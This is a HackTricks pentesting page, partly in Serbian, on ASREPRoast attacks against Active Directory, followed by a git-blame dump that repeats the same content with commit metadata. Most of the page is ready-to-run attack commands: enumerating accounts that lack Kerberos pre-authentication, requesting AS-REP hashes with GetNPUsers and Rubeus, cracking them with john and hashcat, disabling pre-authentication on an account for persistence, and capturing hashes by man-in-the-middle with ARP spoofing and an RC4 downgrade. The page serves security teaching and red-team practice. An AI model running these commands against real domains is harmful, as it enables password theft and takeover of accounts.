hacktricks/windows-hardening/active-directory-methodology/asreproast.md

# ASREPRoast

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

<figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>

Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!

**Hacking Insights**\
Engage with content that delves into the thrill and challenges of hacking

**Real-Time Hack News**\
Keep up-to-date with fast-paced hacking world through real-time news and insights

**Latest Announcements**\
Stay informed with the newest bug bounties launching and crucial platform updates

**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!

## ASREPRoast

ASREPRoast je bezbednosni napad koji koristi korisnike koji nemaju **atribut potreban za Kerberos pre-autentifikaciju**. Suštinski, ova ranjivost omogućava napadačima da zatraže autentifikaciju za korisnika od Kontrolera domena (DC) bez potrebe za korisnikovom lozinkom. DC zatim odgovara porukom šifrovanom korisnikovim ključem izvedenim iz lozinke, koju napadači mogu pokušati da dešifruju offline kako bi otkrili korisnikovu lozinku.

Glavni zahtevi za ovaj napad su:

* **Nedostatak Kerberos pre-autentifikacije**: Ciljani korisnici ne smeju imati ovu bezbednosnu funkciju omogućenu.
* **Povezanost sa Kontrolerom domena (DC)**: Napadači trebaju pristup DC-u da bi slali zahteve i primali šifrovane poruke.
* **Opcionalni domen korisnički nalog**: Imati domen korisnički nalog omogućava napadačima da efikasnije identifikuju ranjive korisnike putem LDAP upita. Bez takvog naloga, napadači moraju da pogađaju korisnička imena.

#### Enumerating vulnerable users (need domain credentials)

{% code title="Using Windows" %}
```bash
Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
```
{% endcode %}

{% code title="Korišćenje Linux-a" %}
```bash
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName
```
#### Zahtev AS\_REP poruke

{% code title="Korišćenje Linux-a" %}
```bash
#Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
```
{% endcode %}

{% code title="Korišćenje Windows-a" %}
```bash
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
```
{% endcode %}

{% hint style="warning" %}
AS-REP Roasting sa Rubeus će generisati 4768 sa tipom enkripcije 0x17 i tipom preautentifikacije 0.
{% endhint %}

### Razbijanje
```bash
john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
```
### Persistence

Prisilite **preauth** da nije potreban za korisnika gde imate **GenericAll** dozvole (ili dozvole za pisanje svojstava):

{% code title="Using Windows" %}
```bash
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
```
{% endcode %}

{% code title="Korišćenje Linux-a" %}
```bash
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH
```
{% endcode %}

## ASREProast bez kredencijala

Napadač može iskoristiti poziciju man-in-the-middle da uhvati AS-REP pakete dok prolaze kroz mrežu, bez oslanjanja na to da Kerberos pre-autentifikacija bude onemogućena. Stoga funkcioniše za sve korisnike na VLAN-u.\
[ASRepCatcher](https://github.com/Yaxxine7/ASRepCatcher) nam to omogućava. Štaviše, alat prisiljava klijentske radne stanice da koriste RC4 menjajući Kerberos pregovaranje.
```bash
# Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supported
ASRepCatcher relay -dc $DC_IP

# Disabling ARP spoofing, the mitm position must be obtained differently
ASRepCatcher relay -dc $DC_IP --disable-spoofing

# Passive listening of AS-REP packets, no packet alteration
ASRepCatcher listen
```
## References

* [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)

***

<figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>

Pridružite se [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) serveru da komunicirate sa iskusnim hakerima i lovcima na greške!

**Hacking Insights**\
Uključite se u sadržaj koji istražuje uzbuđenje i izazove hakovanja

**Real-Time Hack News**\
Budite u toku sa brzim svetom hakovanja kroz vesti i uvide u realnom vremenu

**Latest Announcements**\
Budite informisani o najnovijim nagradama za greške i važnim ažuriranjima platformi

**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) i počnite da sarađujete sa vrhunskim hakerima danas!

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}
GitBook: [#3195] No subject 2022-05-08 23:13:03 +00:00			`# ASREPRoast`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`{% hint style="success" %}`
			`Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`<details>`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`<summary>Support HackTricks</summary>`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00
			`</details>`
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`{% endhint %}`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00
Translated ['README.md', 'generic-methodologies-and-resources/pentesting 2024-11-19 12:35:30 +00:00			`<figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`Join [HackenProof Discord](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`Hacking Insights\`
			`Engage with content that delves into the thrill and challenges of hacking`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`Real-Time Hack News\`
			`Keep up-to-date with fast-paced hacking world through real-time news and insights`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`Latest Announcements\`
			`Stay informed with the newest bug bounties launching and crucial platform updates`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`Join us on [Discord](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00
			`## ASREPRoast`

Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`ASREPRoast je bezbednosni napad koji koristi korisnike koji nemaju atribut potreban za Kerberos pre-autentifikaciju. Suštinski, ova ranjivost omogućava napadačima da zatraže autentifikaciju za korisnika od Kontrolera domena (DC) bez potrebe za korisnikovom lozinkom. DC zatim odgovara porukom šifrovanom korisnikovim ključem izvedenim iz lozinke, koju napadači mogu pokušati da dešifruju offline kako bi otkrili korisnikovu lozinku.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Serbian 2024-02-10 13:11:20 +00:00			`Glavni zahtevi za ovaj napad su:`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`* Nedostatak Kerberos pre-autentifikacije: Ciljani korisnici ne smeju imati ovu bezbednosnu funkciju omogućenu.`
			`* Povezanost sa Kontrolerom domena (DC): Napadači trebaju pristup DC-u da bi slali zahteve i primali šifrovane poruke.`
			`* Opcionalni domen korisnički nalog: Imati domen korisnički nalog omogućava napadačima da efikasnije identifikuju ranjive korisnike putem LDAP upita. Bez takvog naloga, napadači moraju da pogađaju korisnička imena.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`#### Enumerating vulnerable users (need domain credentials)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`{% code title="Using Windows" %}`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView`
			```
Translated ['windows-hardening/active-directory-methodology/asreproast.m 2024-03-26 09:12:34 +00:00			`{% endcode %}`

			`{% code title="Korišćenje Linux-a" %}`
Add asreproast bloodyAD 2024-01-18 09:40:35 +00:00			```bash
Translated to Serbian 2024-02-10 13:11:20 +00:00			`bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName`
Add asreproast bloodyAD 2024-01-18 09:40:35 +00:00			```
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`#### Zahtev AS\_REP poruke`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:40:09 +00:00			`{% code title="Korišćenje Linux-a" %}`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`#Try all the usernames in usernames.txt`
			`python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast`
			`#Use domain creds to extract targets and target them`
			`python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast`
			```
Translated ['windows-hardening/active-directory-methodology/asreproast.m 2024-03-26 09:12:34 +00:00			`{% endcode %}`

			`{% code title="Korišćenje Windows-a" %}`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
GitBook: [#3389] No subject 2022-08-15 13:00:19 +00:00			`.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)`
			```
			`{% endcode %}`

GitBook: [#3389] No subject 2022-08-15 13:00:19 +00:00			`{% hint style="warning" %}`
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`AS-REP Roasting sa Rubeus će generisati 4768 sa tipom enkripcije 0x17 i tipom preautentifikacije 0.`
GitBook: [#3389] No subject 2022-08-15 13:00:19 +00:00			`{% endhint %}`

Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`### Razbijanje`
a 2024-02-08 03:08:28 +00:00			```bash
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`john --wordlist=passwords_kerb.txt hashes.asreproast`
Translated to Serbian 2024-02-10 13:11:20 +00:00			`hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`### Persistence`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`Prisilite preauth da nije potreban za korisnika gde imate GenericAll dozvole (ili dozvole za pisanje svojstava):`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`{% code title="Using Windows" %}`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose`
			```
Translated ['windows-hardening/active-directory-methodology/asreproast.m 2024-03-26 09:12:34 +00:00			`{% endcode %}`

			`{% code title="Korišćenje Linux-a" %}`
Add asreproast bloodyAD 2024-01-18 09:40:35 +00:00			```bash
			`bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH`
			```
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`{% endcode %}`

			`## ASREProast bez kredencijala`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00
Translated ['README.md', 'generic-methodologies-and-resources/pentesting 2024-11-19 12:35:30 +00:00			`Napadač može iskoristiti poziciju man-in-the-middle da uhvati AS-REP pakete dok prolaze kroz mrežu, bez oslanjanja na to da Kerberos pre-autentifikacija bude onemogućena. Stoga funkcioniše za sve korisnike na VLAN-u.\`
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`[ASRepCatcher](https://github.com/Yaxxine7/ASRepCatcher) nam to omogućava. Štaviše, alat prisiljava klijentske radne stanice da koriste RC4 menjajući Kerberos pregovaranje.`
Translated ['windows-hardening/active-directory-methodology/asreproast.m 2024-03-26 09:12:34 +00:00			```bash
			`# Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supported`
Translated ['windows-hardening/active-directory-methodology/asreproast.m 2024-04-01 21:18:06 +00:00			`ASRepCatcher relay -dc $DC_IP`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['windows-hardening/active-directory-methodology/asreproast.m 2024-03-26 09:12:34 +00:00			`# Disabling ARP spoofing, the mitm position must be obtained differently`
Translated ['windows-hardening/active-directory-methodology/asreproast.m 2024-04-01 21:18:06 +00:00			`ASRepCatcher relay -dc $DC_IP --disable-spoofing`
Translated ['windows-hardening/active-directory-methodology/asreproast.m 2024-03-26 09:12:34 +00:00
			`# Passive listening of AS-REP packets, no packet alteration`
Translated ['windows-hardening/active-directory-methodology/asreproast.m 2024-04-01 21:18:06 +00:00			`ASRepCatcher listen`
Translated ['windows-hardening/active-directory-methodology/asreproast.m 2024-03-26 09:12:34 +00:00			```
Translated ['README.md', 'generic-methodologies-and-resources/pentesting 2024-11-19 12:35:30 +00:00			`## References`
GITBOOK-3816: No subject 2023-03-05 19:54:13 +00:00
a 2024-02-08 03:08:28 +00:00			`* [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)`

			`***`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['README.md', 'generic-methodologies-and-resources/pentesting 2024-11-19 12:35:30 +00:00			`<figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>`
hp 2023-07-14 15:03:41 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`Pridružite se [HackenProof Discord](https://discord.com/invite/N3FrSbmwdy) serveru da komunicirate sa iskusnim hakerima i lovcima na greške!`
GITBOOK-3816: No subject 2023-03-05 19:54:13 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`Hacking Insights\`
Translated to Serbian 2024-02-10 13:11:20 +00:00			`Uključite se u sadržaj koji istražuje uzbuđenje i izazove hakovanja`
hp 2023-02-27 09:28:45 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`Real-Time Hack News\`
Translated to Serbian 2024-02-10 13:11:20 +00:00			`Budite u toku sa brzim svetom hakovanja kroz vesti i uvide u realnom vremenu`
hp 2023-02-27 09:28:45 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`Latest Announcements\`
			`Budite informisani o najnovijim nagradama za greške i važnim ažuriranjima platformi`
hp 2023-02-27 09:28:45 +00:00
Translated ['README.md', 'generic-methodologies-and-resources/pentesting 2024-11-19 12:35:30 +00:00			`Join us on [Discord](https://discord.com/invite/N3FrSbmwdy) i počnite da sarađujete sa vrhunskim hakerima danas!`
new link 2022-11-05 09:07:43 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`{% hint style="success" %}`
Translated ['README.md', 'generic-methodologies-and-resources/pentesting 2024-11-19 12:35:30 +00:00			`Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['README.md', 'generic-methodologies-and-resources/pentesting 2024-11-19 12:35:30 +00:00			`<summary>Support HackTricks</summary>`
arte 2024-01-02 18:28:27 +00:00
Translated ['README.md', 'generic-methodologies-and-resources/pentesting 2024-11-19 12:35:30 +00:00			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`{% endhint %}`